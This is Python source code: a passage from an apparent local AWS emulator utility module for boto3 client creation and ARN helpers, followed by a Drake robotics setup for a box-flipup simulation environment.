Generic method to obtain an AWS service resource using boto3, based on environment, region, or custom endpoint_url.
"""
return connect_to_service(
service_name,
client=False,
env=env,
region_name=region_name,
endpoint_url=endpoint_url,
)
def connect_to_service(
service_name,
client=True,
env=None,
region_name=None,
endpoint_url=None,
config: botocore.config.Config = None,
verify=False,
cache=True,
*args,
**kwargs,
):
"""
Generic method to obtain an AWS service client using boto3, based on environment, region, or custom endpoint_url.
"""
# determine context and create cache key
region_name = region_name or get_region()
env = get_environment(env, region_name=region_name)
region = env.region if env.region != REGION_LOCAL else region_name
key_elements = [service_name, client, env, region, endpoint_url, config, kwargs]
cache_key = "/".join([str(k) for k in key_elements])
# check cache first (most calls will be served from cache)
if cache and cache_key in BOTO_CLIENTS_CACHE:
return BOTO_CLIENTS_CACHE[cache_key]
with BOTO_CLIENT_CREATE_LOCK:
# check cache again within lock context to avoid race conditions
if cache and cache_key in BOTO_CLIENTS_CACHE:
return BOTO_CLIENTS_CACHE[cache_key]
# determine endpoint_url if it is not set explicitly
if not endpoint_url:
if is_local_env(env):
endpoint_url = get_local_service_url(service_name)
verify = False
backend_env_name = "%s_BACKEND" % service_name.upper()
backend_url = os.environ.get(backend_env_name, "").strip()
if backend_url:
endpoint_url = backend_url
# configure S3 path/host style addressing
if service_name == "s3":
if re.match(r"https?://localhost(:[0-9]+)?", endpoint_url):
endpoint_url = endpoint_url.replace("://localhost", "://%s" % get_s3_hostname())
# create boto client or resource from potentially cached session
boto_session = get_boto3_session(cache=cache)
boto_config = config or botocore.client.Config()
boto_factory = boto_session.client if client else boto_session.resource
# To, prevent error "Connection pool is full, discarding connection ...",
# set the environment variable MAX_POOL_CONNECTIONS. Default is 150.
boto_config.max_pool_connections = MAX_POOL_CONNECTIONS
new_client = boto_factory(
service_name,
region_name=region,
endpoint_url=endpoint_url,
verify=verify,
config=boto_config,
**kwargs,
)
if cache:
BOTO_CLIENTS_CACHE[cache_key] = new_client
return new_client
def create_external_boto_client(
service_name,
client=True,
env=None,
region_name=None,
endpoint_url=None,
config: botocore.config.Config = None,
verify=False,
cache=True,
*args,
**kwargs,
):
return connect_to_service(
service_name,
client,
env,
region_name,
endpoint_url,
config,
verify,
cache,
aws_access_key_id="__test_call__",
aws_secret_access_key="__test_key__",
*args,
**kwargs,
)
def get_s3_hostname():
global CACHE_S3_HOSTNAME_DNS_STATUS
if CACHE_S3_HOSTNAME_DNS_STATUS is None:
try:
assert socket.gethostbyname(S3_VIRTUAL_HOSTNAME)
CACHE_S3_HOSTNAME_DNS_STATUS = True
except socket.error:
CACHE_S3_HOSTNAME_DNS_STATUS = False
if CACHE_S3_HOSTNAME_DNS_STATUS:
return S3_VIRTUAL_HOSTNAME
return LOCALHOST
# TODO remove from here in the future
def render_velocity_template(*args, **kwargs):
return templating.render_velocity_template(*args, **kwargs)
def generate_presigned_url(*args, **kwargs):
endpoint_url = kwargs.pop("endpoint_url", None)
s3_client = connect_to_service(
"s3",
endpoint_url=endpoint_url,
cache=False,
# Note: presigned URL needs to be created with (external) test credentials
aws_access_key_id=TEST_AWS_ACCESS_KEY_ID,
aws_secret_access_key=TEST_AWS_SECRET_ACCESS_KEY,
)
return s3_client.generate_presigned_url(*args, **kwargs)
def check_valid_region(headers):
"""Check whether a valid region is provided, and if not then raise an Exception."""
auth_header = headers.get("Authorization")
if not auth_header:
raise Exception('Unable to find "Authorization" header in request')
replaced = re.sub(r".*Credential=([^,]+),.*", r"\1", auth_header)
if auth_header == replaced:
raise Exception('Unable to find "Credential" section in "Authorization" header')
# Format is: <your-access-key-id>/<date>/<aws-region>/<aws-service>/aws4_request
# See https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-auth-using-authorization-header.html
parts = replaced.split("/")
region = parts[2]
if region not in config.VALID_REGIONS:
raise Exception('Invalid region specified in "Authorization" header: "%s"' % region)
def set_default_region_in_headers(headers, service=None, region=None):
# this should now be a no-op, as we support arbitrary regions and don't use a "default" region
# TODO: remove this function once the legacy USE_SINGLE_REGION config is removed
if not config.USE_SINGLE_REGION:
return
auth_header = headers.get("Authorization")
region = region or get_region()
if not auth_header:
if service:
headers["Authorization"] = mock_aws_request_headers(service, region_name=region)[
"Authorization"
]
return
replaced = re.sub(r"(.*Credential=[^/]+/[^/]+/)([^/])+/", r"\1%s/" % region, auth_header)
headers["Authorization"] = replaced
def fix_account_id_in_arns(response, colon_delimiter=":", existing=None, replace=None):
"""Fix the account ID in the ARNs returned in the given Flask response or string"""
existing = existing or ["123456789", "1234567890", "123456789012", MOTO_ACCOUNT_ID]
existing = existing if isinstance(existing, list) else [existing]
replace = replace or TEST_AWS_ACCOUNT_ID
is_str_obj = is_string_or_bytes(response)
content = to_str(response if is_str_obj else response._content)
replace = r"arn{col}aws{col}\1{col}\2{col}{acc}{col}".format(col=colon_delimiter, acc=replace)
for acc_id in existing:
regex = r"arn{col}aws{col}([^:%]+){col}([^:%]*){col}{acc}{col}".format(
col=colon_delimiter, acc=acc_id
)
content = re.sub(regex, replace, content)
if not is_str_obj:
response._content = content
response.headers["Content-Length"] = len(response._content)
return response
return content
def inject_test_credentials_into_env(env):
if ENV_ACCESS_KEY not in env and ENV_SECRET_KEY not in env:
env[ENV_ACCESS_KEY] = "test"
env[ENV_SECRET_KEY] = "test"
def inject_region_into_env(env, region):
env["AWS_REGION"] = region
def dynamodb_table_exists(table_name, client=None):
client = client or connect_to_service("dynamodb")
paginator = client.get_paginator("list_tables")
pages = paginator.paginate(PaginationConfig={"PageSize": 100})
for page in pages:
table_names = page["TableNames"]
if to_str(table_name) in table_names:
return True
return False
def sqs_queue_url_for_arn(queue_arn):
if "://" in queue_arn:
return queue_arn
if queue_arn in SQS_ARN_TO_URL_CACHE:
return SQS_ARN_TO_URL_CACHE[queue_arn]
try:
arn = parse_arn(queue_arn)
region_name = arn["region"]
queue_name = arn["resource"]
except InvalidArnException:
region_name = None
queue_name = queue_arn
sqs_client = connect_to_service("sqs", region_name=region_name)
result = sqs_client.get_queue_url(QueueName=queue_name)["QueueUrl"]
SQS_ARN_TO_URL_CACHE[queue_arn] = result
return result
# TODO: remove and merge with sqs_queue_url_for_arn(..) above!!
def get_sqs_queue_url(queue_arn: str) -> str:
return sqs_queue_url_for_arn(queue_arn)
def extract_region_from_auth_header(headers: Dict[str, str], use_default=True) -> str:
auth = headers.get("Authorization") or ""
region = re.sub(r".*Credential=[^/]+/[^/]+/([^/]+)/.*", r"\1", auth)
if region == auth:
region = None
if use_default:
region = region or get_region()
return region
def extract_access_key_id_from_auth_header(headers: Dict[str, str]) -> str:
auth = headers.get("Authorization") or ""
access_id = re.sub(r".*Credential=([^/]+)/[^/]+/[^/]+/.*", r"\1", auth)
if access_id == auth:
access_id = None
return access_id
# TODO: extract ARN utils into separate file!
_arn_parser = ArnParser()
class ArnData(TypedDict):
partition: str
service: str
region: str
account: str
resource: str
def parse_arn(arn: str) -> ArnData:
"""
Uses a botocore ArnParser to parse an arn.
:param arn: the arn string to parse
:returns: a dictionary containing the ARN components
:raises InvalidArnException: if the arn is invalid
"""
return _arn_parser.parse_arn(arn)
def extract_region_from_arn(arn: str) -> Optional[str]:
try:
return parse_arn(arn).get("region")
except InvalidArnException:
return None
def extract_service_from_arn(arn: str) -> Optional[str]:
try:
return parse_arn(arn).get("service")
except InvalidArnException:
return None
def get_account_id(account_id=None, env=None):
if account_id:
return account_id
env = get_environment(env)
if is_local_env(env):
return os.environ["TEST_AWS_ACCOUNT_ID"]
raise Exception("Unable to determine AWS account ID (%s, %s)" % (account_id, env))
def role_arn(role_name, account_id=None, env=None):
if not role_name:
return role_name
if role_name.startswith("arn:aws:iam::"):
return role_name
env = get_environment(env)
account_id = get_account_id(account_id, env=env)
return "arn:aws:iam::%s:role/%s" % (account_id, role_name)
def policy_arn(policy_name, account_id=None):
if ":policy/" in policy_name:
return policy_name
account_id = account_id or TEST_AWS_ACCOUNT_ID
return "arn:aws:iam::{}:policy/{}".format(account_id, policy_name)
def iam_resource_arn(resource, role=None, env=None):
env = get_environment(env)
if not role:
role = get_iam_role(resource, env=env)
return role_arn(role_name=role, account_id=get_account_id())
def get_iam_role(resource, env=None):
env = get_environment(env)
return "role-%s" % resource
# TODO: remove this (can't statically define secret ARN because it includes a random suffix)
def secretsmanager_secret_arn(secret_id, account_id=None, region_name=None):
if ":" in (secret_id or ""):
return secret_id
pattern = "arn:aws:secretsmanager:%s:%s:secret:%s"
return _resource_arn(secret_id, pattern, account_id=account_id, region_name=region_name)
def cloudformation_stack_arn(stack_name, stack_id=None, account_id=None, region_name=None):
stack_id = stack_id or "id-123"
pattern = "arn:aws:cloudformation:%s:%s:stack/%s/{stack_id}".format(stack_id=stack_id)
return _resource_arn(stack_name, pattern, account_id=account_id, region_name=region_name)
def cf_change_set_arn(change_set_name, change_set_id=None, account_id=None, region_name=None):
change_set_id = change_set_id or "id-456"
pattern = "arn:aws:cloudformation:%s:%s:changeSet/%s/{cs_id}".format(cs_id=change_set_id)
return _resource_arn(change_set_name, pattern, account_id=account_id, region_name=region_name)
def dynamodb_table_arn(table_name, account_id=None, region_name=None):
table_name = table_name.split(":table/")[-1]
pattern = "arn:aws:dynamodb:%s:%s:table/%s"
return _resource_arn(table_name, pattern, account_id=account_id, region_name=region_name)
def dynamodb_stream_arn(table_name, latest_stream_label, account_id=None):
account_id = get_account_id(account_id)
return "arn:aws:dynamodb:%s:%s:table/%s/stream/%s" % (
get_region(),
account_id,
table_name,
latest_stream_label,
)
def cloudwatch_alarm_arn(alarm_name, account_id=None, region_name=None):
pattern = "arn:aws:cloudwatch:%s:%s:alarm:%s"
return _resource_arn(alarm_name, pattern, account_id=account_id, region_name=region_name)
def log_group_arn(group_name, account_id=None, region_name=None):
pattern = "arn:aws:logs:%s:%s:log-group:%s"
return _resource_arn(group_name, pattern, account_id=account_id, region_name=region_name)
def events_rule_arn(rule_name, account_id=None, region_name=None):
pattern = "arn:aws:events:%s:%s:rule/%s"
return _resource_arn(rule_name, pattern, account_id=account_id, region_name=region_name)
def lambda_function_arn(function_name, account_id=None, region_name=None):
return lambda_function_or_layer_arn(
"function", function_name, account_id=account_id, region_name=region_name
)
def lambda_layer_arn(layer_name, version=None, account_id=None):
return lambda_function_or_layer_arn("layer", layer_name, version=None, account_id=account_id)
def lambda_function_or_layer_arn(
type, entity_name, version=None, account_id=None, region_name=None
):
pattern = "arn:aws:lambda:.*:.*:(function|layer):.*"
if re.match(pattern, entity_name):
return entity_name
if ":" in entity_name:
client = connect_to_service("lambda")
entity_name, _, alias = entity_name.rpartition(":")
try:
alias_response = client.get_alias(FunctionName=entity_name, Name=alias)
version = alias_response["FunctionVersion"]
except Exception as e:
msg = "Alias %s of %s not found" % (alias, entity_name)
LOG.info(f"{msg}: {e}")
raise Exception(msg)
account_id = get_account_id(account_id)
region_name = region_name or get_region()
pattern = re.sub(r"\([^\|]+\|.+\)", type, pattern)
result = pattern.replace(".*", "%s") % (region_name, account_id, entity_name)
if version:
result = "%s:%s" % (result, version)
return result
def lambda_function_name(name_or_arn):
if ":" in name_or_arn:
arn = parse_arn(name_or_arn)
if arn["service"] != "lambda":
raise ValueError("arn is not a lambda arn %s" % name_or_arn)
return parse_arn(name_or_arn)["resource"].split(":")[1]
else:
return name_or_arn
def state_machine_arn(name, account_id=None, region_name=None):
pattern = "arn:aws:states:%s:%s:stateMachine:%s"
return _resource_arn(name, pattern, account_id=account_id, region_name=region_name)
def stepfunctions_activity_arn(name, account_id=None, region_name=None):
pattern = "arn:aws:states:%s:%s:activity:%s"
return _resource_arn(name, pattern, account_id=account_id, region_name=region_name)
def fix_arn(arn):
"""Function that attempts to "canonicalize" the given ARN. This includes converting
resource names to ARNs, replacing incorrect regions, account IDs, etc."""
if arn.startswith("arn:aws:lambda"):
parts = arn.split(":")
region = parts[3] if parts[3] in config.VALID_REGIONS else get_region()
return lambda_function_arn(lambda_function_name(arn), region_name=region)
LOG.warning("Unable to fix/canonicalize ARN: %s", arn)
return arn
def cognito_user_pool_arn(user_pool_id, account_id=None, region_name=None):
pattern = "arn:aws:cognito-idp:%s:%s:userpool/%s"
return _resource_arn(user_pool_id, pattern, account_id=account_id, region_name=region_name)
def kinesis_stream_arn(stream_name, account_id=None, region_name=None):
pattern = "arn:aws:kinesis:%s:%s:stream/%s"
return _resource_arn(stream_name, pattern, account_id=account_id, region_name=region_name)
def elasticsearch_domain_arn(domain_name, account_id=None, region_name=None):
pattern = "arn:aws:es:%s:%s:domain/%s"
return _resource_arn(domain_name, pattern, account_id=account_id, region_name=region_name)
def firehose_stream_arn(stream_name, account_id=None, region_name=None):
pattern = "arn:aws:firehose:%s:%s:deliverystream/%s"
return _resource_arn(stream_name, pattern, account_id=account_id, region_name=region_name)
def es_domain_arn(domain_name, account_id=None, region_name=None):
pattern = "arn:aws:es:%s:%s:domain/%s"
return _resource_arn(domain_name, pattern, account_id=account_id, region_name=region_name)
def kms_key_arn(key_id: str, account_id: str = None, region_name: str = None) -> str:
pattern = "arn:aws:kms:%s:%s:key/%s"
return _resource_arn(key_id, pattern, account_id=account_id, region_name=region_name)
def code_signing_arn(code_signing_id: str, account_id: str = None, region_name: str = None) -> str:
pattern = "arn:aws:lambda:%s:%s:code-signing-config:%s"
return _resource_arn(code_signing_id, pattern, account_id=account_id, region_name=region_name)
def ssm_parameter_arn(param_name: str, account_id: str = None, region_name: str = None) -> str:
pattern = "arn:aws:ssm:%s:%s:parameter/%s"
param_name = param_name.lstrip("/")
return _resource_arn(param_name, pattern, account_id=account_id, region_name=region_name)
def s3_bucket_arn(bucket_name_or_arn: str, account_id=None):
bucket_name = s3_bucket_name(bucket_name_or_arn)
return "arn:aws:s3:::%s" % bucket_name
def s3_bucket_name(bucket_name_or_arn: str) -> str:
return bucket_name_or_arn.split(":::")[-1]
def _resource_arn(name: str, pattern: str, account_id: str = None, region_name: str = None) -> str:
if ":" in name:
return name
account_id = get_account_id(account_id)
region_name = region_name or get_region()
if len(pattern.split("%s")) == 3:
return pattern % (account_id, name)
return pattern % (region_name, account_id, name)
def get_events_target_attributes(target):
return dict_utils.pick_attributes(target, EVENT_TARGET_PARAMETERS)
def get_or_create_bucket(bucket_name, s3_client=None):
s3_client = s3_client or connect_to_service("s3")
try:
return s3_client.head_bucket(Bucket=bucket_name)
except Exception:
return s3_client.create_bucket(Bucket=bucket_name)
def create_sqs_queue(queue_name, env=None):
env = get_environment(env)
# queue
conn = connect_to_service("sqs", env=env)
return conn.create_queue(QueueName=queue_name)
def sqs_queue_arn(queue_name, account_id=None, region_name=None):
account_id = get_account_id(account_id)
region_name = region_name or get_region()
queue_name = queue_name.split("/")[-1]
return "arn:aws:sqs:%s:%s:%s" % (region_name, account_id, queue_name)
def apigateway_restapi_arn(api_id, account_id=None, region_name=None):
account_id = get_account_id(account_id)
region_name = region_name or get_region()
return "arn:aws:apigateway:%s:%s:/restapis/%s" % (region_name, account_id, api_id)
def sqs_queue_name(queue_arn):
if ":" in queue_arn:
return parse_arn(queue_arn)["resource"]
else:
return queue_arn
def sns_topic_arn(topic_name, account_id=None):
account_id = get_account_id(account_id)
return "arn:aws:sns:%s:%s:%s" % (get_region(), account_id, topic_name)
def sqs_receive_message(queue_arn):
region_name = extract_region_from_arn(queue_arn)
client = connect_to_service("sqs", region_name=region_name)
queue_url = get_sqs_queue_url(queue_arn)
response = client.receive_message(QueueUrl=queue_url)
return response
def firehose_name(firehose_arn):
return firehose_arn.split("/")[-1]
def kinesis_stream_name(kinesis_arn):
return kinesis_arn.split(":stream/")[-1]
def mock_aws_request_headers(service="dynamodb", region_name=None, access_key=None):
ctype = APPLICATION_AMZ_JSON_1_0
if service == "kinesis":
ctype = APPLICATION_AMZ_JSON_1_1
elif service in ["sns", "sqs"]:
ctype = APPLICATION_X_WWW_FORM_URLENCODED
# TODO: consider adding an internal=False flag, to use INTERNAL_AWS_ACCESS_KEY_ID for internal calls here
access_key = access_key or constants.TEST_AWS_ACCESS_KEY_ID
region_name = region_name or get_region()
headers = {
"Content-Type": ctype,
"Accept-Encoding": "identity",
"X-Amz-Date": "20160623T103251Z",
"Authorization": (
"AWS4-HMAC-SHA256 "
+ "Credential=%s/20160623/%s/%s/aws4_request, "
+ "SignedHeaders=content-type;host;x-amz-date;x-amz-target, Signature=1234"
)
% (access_key, region_name, service),
}
return headers
def inject_region_into_auth_headers(region, headers):
auth_header = headers.get("Authorization")
if auth_header:
regex = r"Credential=([^/]+)/([^/]+)/([^/]+)/"
auth_header = re.sub(regex, r"Credential=\1/\2/%s/" % region, auth_header)
headers["Authorization"] = auth_header
def dynamodb_get_item_raw(request):
headers = mock_aws_request_headers()
headers["X-Amz-Target"] = "DynamoDB_20120810.GetItem"
new_item = make_http_request(
url=config.service_url("dynamodb"),
method="POST",
data=json.dumps(request),
headers=headers,
)
new_item = new_item.text
new_item = new_item and json.loads(new_item)
return new_item
def create_dynamodb_table(
table_name,
partition_key,
env=None,
stream_view_type=None,
region_name=None,
client=None,
sleep_after=2,
):
"""Utility method to create a DynamoDB table"""
dynamodb = client or connect_to_service(
"dynamodb", env=env, client=True, region_name=region_name
)
stream_spec = {"StreamEnabled": False}
key_schema = [{"AttributeName": partition_key, "KeyType": "HASH"}]
attr_defs = [{"AttributeName": partition_key, "AttributeType": "S"}]
if stream_view_type is not None:
stream_spec = {"StreamEnabled": True, "StreamViewType": stream_view_type}
table = None
try:
table = dynamodb.create_table(
TableName=table_name,
KeySchema=key_schema,
AttributeDefinitions=attr_defs,
ProvisionedThroughput={"ReadCapacityUnits": 10, "WriteCapacityUnits": 10},
StreamSpecification=stream_spec,
)
except Exception as e:
if "ResourceInUseException" in str(e):
# Table already exists -> return table reference
return connect_to_resource("dynamodb", env=env, region_name=region_name).Table(
table_name
)
if "AccessDeniedException" in str(e):
raise
if sleep_after:
# TODO: do we need this?
time.sleep(sleep_after)
return table
def get_apigateway_integration(api_id, method, path, env=None):
apigateway = connect_to_service(service_name="apigateway", client=True, env=env)
resources = apigateway.get_resources(restApiId=api_id, limit=100)
resource_id = None
for r in resources["items"]:
if r["path"] == path:
resource_id = r["id"]
if not resource_id:
raise Exception('Unable to find apigateway integration for path "%s"' % path)
integration = apigateway.get_integration(
restApiId=api_id, resourceId=resource_id, httpMethod=method
)
return integration
def get_apigateway_resource_for_path(api_id, path, parent=None, resources=None):
if resources is None:
apigateway = connect_to_service(service_name="apigateway")
resources = apigateway.get_resources(restApiId=api_id, limit=100)
if not isinstance(path, list):
path = path.split("/")
if not path:
return parent
for resource in resources:
if resource["pathPart"] == path[0] and (not parent or parent["id"] == resource["parentId"]):
return get_apigateway_resource_for_path(
api_id, path[1:], parent=resource, resources=resources
)
return None
def get_apigateway_path_for_resource(
api_id, resource_id, path_suffix="", resources=None, region_name=None
):
if resources is None:
apigateway = connect_to_service(service_name="apigateway", region_name=region_name)
resources = apigateway.get_resources(restApiId=api_id, limit=100)["items"]
target_resource = list(filter(lambda res: res["id"] == resource_id, resources))[0]
path_part = target_resource.get("pathPart", "")
if path_suffix:
if path_part:
path_suffix = "%s/%s" % (path_part, path_suffix)
else:
path_suffix = path_part
parent_id = target_resource.get("parentId")
if not parent_id:
return "/%s" % path_suffix
return get_apigateway_path_for_resource(
api_id,
parent_id,
path_suffix=path_suffix,
resources=resources,
region_name=region_name,
)
def create_api_gateway(
name,
description=None,
resources=None,
stage_name=None,
enabled_api_keys=None,
env=None,
usage_plan_name=None,
region_name=None,
auth_creator_func=None, # function that receives an api_id and returns an authorizer_id
):
if enabled_api_keys is None:
enabled_api_keys = []
client = connect_to_service("apigateway", env=env, region_name=region_name)
resources = resources or []
stage_name = stage_name or "testing"
usage_plan_name = usage_plan_name or "Basic Usage"
description = description or 'Test description for API "%s"' % name
LOG.info('Creating API resources under API Gateway "%s".', name)
api = client.create_rest_api(name=name, description=description)
api_id = api["id"]
auth_id = None
if auth_creator_func:
auth_id = auth_creator_func(api_id)
resources_list = client.get_resources(restApiId=api_id)
root_res_id = resources_list["items"][0]["id"]
# add API resources and methods
for path, methods in resources.items():
# create resources recursively
parent_id = root_res_id
for path_part in path.split("/"):
api_resource = client.create_resource(
restApiId=api_id, parentId=parent_id, pathPart=path_part
)
parent_id = api_resource["id"]
# add methods to the API resource
for method in methods:
kwargs = {"authorizerId": auth_id} if auth_id else {}
client.put_method(
restApiId=api_id,
resourceId=api_resource["id"],
httpMethod=method["httpMethod"],
authorizationType=method.get("authorizationType") or "NONE",
apiKeyRequired=method.get("apiKeyRequired") or False,
requestParameters=method.get("requestParameters") or {},
requestModels=method.get("requestModels") or {},
**kwargs,
)
# create integrations for this API resource/method
integrations = method["integrations"]
create_api_gateway_integrations(
api_id,
api_resource["id"],
method,
integrations,
env=env,
region_name=region_name,
)
# deploy the API gateway
client.create_deployment(restApiId=api_id, stageName=stage_name)
return api
def create_api_gateway_integrations(
api_id, resource_id, method, integrations=None, env=None, region_name=None
):
if integrations is None:
integrations = []
client = connect_to_service("apigateway", env=env, region_name=region_name)
for integration in integrations:
req_templates = integration.get("requestTemplates") or {}
res_templates = integration.get("responseTemplates") or {}
success_code = integration.get("successCode") or "200"
client_error_code = integration.get("clientErrorCode") or "400"
server_error_code = integration.get("serverErrorCode") or "500"
request_parameters = integration.get("requestParameters") or {}
# create integration
client.put_integration(
restApiId=api_id,
resourceId=resource_id,
httpMethod=method["httpMethod"],
integrationHttpMethod=method.get("integrationHttpMethod") or method["httpMethod"],
type=integration["type"],
uri=integration["uri"],
requestTemplates=req_templates,
requestParameters=request_parameters,
)
response_configs = [
{"pattern": "^2.*", "code": success_code, "res_templates": res_templates},
{"pattern": "^4.*", "code": client_error_code, "res_templates": {}},
{"pattern": "^5.*", "code": server_error_code, "res_templates": {}},
]
# create response configs
for response_config in response_configs:
# create integration response
client.put_integration_response(
restApiId=api_id,
resourceId=resource_id,
httpMethod=method["httpMethod"],
statusCode=response_config["code"],
responseTemplates=response_config["res_templates"],
selectionPattern=response_config["pattern"],
)
# create method response
client.put_method_response(
restApiId=api_id,
resourceId=resource_id,
httpMethod=method["httpMethod"],
statusCode=response_config["code"],
)
def apigateway_invocations_arn(lambda_uri, region_name: str = None):
return "arn:aws:apigateway:%s:lambda:path/2015-03-31/functions/%s/invocations" % (
region_name or get_region(),
lambda_uri,
)
def get_opensearch_endpoint(domain_arn: str) -> str:
"""
Get an OpenSearch cluster endpoint by describing the cluster associated with the domain_arn
:param domain_arn: ARN of the cluster.
:returns: cluster endpoint
:raises: ValueError if the domain_arn is malformed
"""
region_name = extract_region_from_arn(domain_arn)
if region_name is None:
raise ValueError("unable to parse region from opensearch domain ARN")
opensearch_client = connect_to_service(service_name="opensearch", region_name=region_name)
domain_name = domain_arn.rpartition("/")[2]
info = opensearch_client.describe_domain(DomainName=domain_name)
base_domain = info["DomainStatus"]["Endpoint"]
endpoint = base_domain if base_domain.startswith("http") else f"https://{base_domain}"
return endpoint
def get_search_db_connection(endpoint: str, region_name: str):
"""
Get a connection to an ElasticSearch or OpenSearch DB
:param endpoint: cluster endpoint
:param region_name: cluster region e.g. us-east-1
"""
from opensearchpy import OpenSearch, RequestsHttpConnection
from requests_aws4auth import AWS4Auth
verify_certs = False
use_ssl = False
# use ssl?
if "https://" in endpoint:
use_ssl = True
# TODO remove this condition once ssl certs are available for .es.localhost.localstack.cloud domains
endpoint_netloc = urlparse(endpoint).netloc
if not re.match(r"^.*(localhost(\.localstack\.cloud)?)(:\d+)?$", endpoint_netloc):
verify_certs = True
LOG.debug("Creating ES client with endpoint %s", endpoint)
if ENV_ACCESS_KEY in os.environ and ENV_SECRET_KEY in os.environ:
access_key = os.environ.get(ENV_ACCESS_KEY)
secret_key = os.environ.get(ENV_SECRET_KEY)
session_token = os.environ.get(ENV_SESSION_TOKEN)
awsauth = AWS4Auth(access_key, secret_key, region_name, "es", session_token=session_token)
connection_class = RequestsHttpConnection
return OpenSearch(
hosts=[endpoint],
verify_certs=verify_certs,
use_ssl=use_ssl,
connection_class=connection_class,
http_auth=awsauth,
)
return OpenSearch(hosts=[endpoint], verify_certs=verify_certs, use_ssl=use_ssl)
def create_kinesis_stream(stream_name, shards=1, env=None, delete=False):
env = get_environment(env)
stream = KinesisStream(id=stream_name, num_shards=shards)
conn = connect_to_service("kinesis", env=env)
stream.connect(conn)
if delete:
run_safe(lambda: stream.destroy(), print_error=False)
stream.create()
# Note: Returning the stream without awaiting its creation (via wait_for()) to avoid API call timeouts/retries.
return stream
def kinesis_get_latest_records(stream_name, shard_id, count=10, env=None):
kinesis = connect_to_service("kinesis", env=env)
result = []
response = kinesis.get_shard_iterator(
StreamName=stream_name, ShardId=shard_id, ShardIteratorType="TRIM_HORIZON"
)
shard_iterator = response["ShardIterator"]
while shard_iterator:
records_response = kinesis.get_records(ShardIterator=shard_iterator)
records = records_response["Records"]
for record in records:
try:
record["Data"] = to_str(record["Data"])
except Exception:
pass
result.extend(records)
shard_iterator = records_response["NextShardIterator"] if records else False
while len(result) > count:
result.pop(0)
return result
def get_stack_details(stack_name, region_name=None):
cloudformation = connect_to_service("cloudformation", region_name=region_name)
stacks = cloudformation.describe_stacks(StackName=stack_name)
for stack in stacks["Stacks"]:
if stack["StackName"] == stack_name:
return stack
def deploy_cf_stack(stack_name, template_body):
cfn = connect_to_service("cloudformation")
cfn.create_stack(StackName=stack_name, TemplateBody=template_body)
# wait for deployment to finish
return await_stack_completion(stack_name)
def await_stack_status(stack_name, expected_statuses, retries=20, sleep=2, region_name=None):
def check_stack():
stack = get_stack_details(stack_name, region_name=region_name)
if stack["StackStatus"] not in expected_statuses:
raise Exception(
'Status "%s" for stack "%s" not in expected list: %s'
% (stack["StackStatus"], stack_name, expected_statuses)
)
return stack
expected_statuses = (
expected_statuses if isinstance(expected_statuses, list) else [expected_statuses]
)
return retry(check_stack, retries, sleep)
def await_stack_completion(stack_name, retries=20, sleep=2, statuses=None, region_name=None):
statuses = statuses or ["CREATE_COMPLETE", "UPDATE_COMPLETE", "DELETE_COMPLETE"]
return await_stack_status(
stack_name, statuses, retries=retries, sleep=sleep, region_name=region_name
)
|
the-stack_106_13057
|
import gym
import numpy as np
from pydrake.all import (
AddMultibodyPlantSceneGraph,
Box,
ConstantVectorSource,
ContactResultsToMeshcat,
ContactResultsToMeshcatParams,
DiagramBuilder,
EventStatus,
FixedOffsetFrame,
InverseDynamicsController,
LeafSystem,
MeshcatVisualizerCpp,
MeshcatVisualizerParams,
MultibodyPlant,
MultibodyPositionToGeometryPose,
Multiplexer,
Parser,
PassThrough,
PlanarJoint,
PrismaticJoint,
RandomGenerator,
Rgba,
RigidTransform,
RotationMatrix,
SceneGraph,
Simulator,
SpatialInertia,
Sphere,
UnitInertia,
Variable,
)
from manipulation.gym import DrakeGymEnv
from manipulation.scenarios import AddShape, SetColor, SetTransparency
from manipulation.utils import FindResource
def AddPlanarBinAndSimpleBox(plant,
mass=1.0,
mu=1.0,
width=0.2,
depth=0.05,
height=0.3):
parser = Parser(plant)
bin = parser.AddModelFromFile(FindResource("models/planar_bin.sdf"))
plant.WeldFrames(
plant.world_frame(), plant.GetFrameByName("bin_base", bin),
RigidTransform(RotationMatrix.MakeZRotation(np.pi / 2.0),
[0, 0, -0.015]))
planar_joint_frame = plant.AddFrame(
FixedOffsetFrame(
"planar_joint_frame", plant.world_frame(),
RigidTransform(RotationMatrix.MakeXRotation(np.pi / 2))))
# TODO(russt): make this a *random* box?
# TODO(russt): move random box to a shared py file.
box_instance = AddShape(plant, Box(width, depth, height), "box", mass, mu)
box_joint = plant.AddJoint(
PlanarJoint("box", planar_joint_frame,
plant.GetFrameByName("box", box_instance)))
box_joint.set_position_limits([-.5, -.1, -np.pi], [.5, .3, np.pi])
box_joint.set_velocity_limits([-2, -2, -2], [2, 2, 2])
box_joint.set_default_translation([0, depth / 2.0])
return box_instance
def AddPointFinger(plant):
finger = AddShape(plant, Sphere(0.01), "finger", color=[.9, .5, .5, 1.0])
false_body1 = plant.AddRigidBody(
"false_body1", finger, SpatialInertia(0, [0, 0, 0],
UnitInertia(0, 0, 0)))
finger_x = plant.AddJoint(
PrismaticJoint("finger_x", plant.world_frame(),
plant.GetFrameByName("false_body1"), [1, 0, 0], -.3, .3))
finger_x.set_position_limits([-.5], [.5])
finger_x.set_velocity_limits([-2], [2])
plant.AddJointActuator("finger_x", finger_x)
finger_z = plant.AddJoint(
PrismaticJoint("finger_z", plant.GetFrameByName("false_body1"),
plant.GetFrameByName("finger"), [0, 0, 1], 0.0, 0.5))
finger_z.set_default_translation(0.25)
finger_z.set_position_limits([-.1], [.3])
finger_z.set_velocity_limits([-2], [2])
plant.AddJointActuator("finger_z", finger_z)
return finger
def make_box_flipup(generator,
observations="state",
meshcat=None,
time_limit=10):
builder = DiagramBuilder()
plant, scene_graph = AddMultibodyPlantSceneGraph(builder, time_step=0.001)
# TODO(russt): randomize parameters.
box = AddPlanarBinAndSimpleBox(plant)
finger = AddPointFinger(plant)
plant.Finalize()
plant.set_name("plant")
SetTransparency(scene_graph, alpha=0.5, source_id=plant.get_source_id())
controller_plant = MultibodyPlant(time_step=0.005)
AddPointFinger(controller_plant)
if meshcat:
MeshcatVisualizerCpp.AddToBuilder(builder, scene_graph, meshcat)
meshcat.Set2dRenderMode(xmin=-.35, xmax=.35, ymin=-0.1, ymax=0.3)
ContactResultsToMeshcat.AddToBuilder(
builder, plant, meshcat,
ContactResultsToMeshcatParams(radius=0.005, newtons_per_meter=40.0))
# Use the controller plant to visualize the set point geometry.
controller_scene_graph = builder.AddSystem(SceneGraph())
controller_plant.RegisterAsSourceForSceneGraph(controller_scene_graph)
SetColor(controller_scene_graph,
color=[1.0, 165.0 / 255, 0.0, 1.0],
source_id=controller_plant.get_source_id())
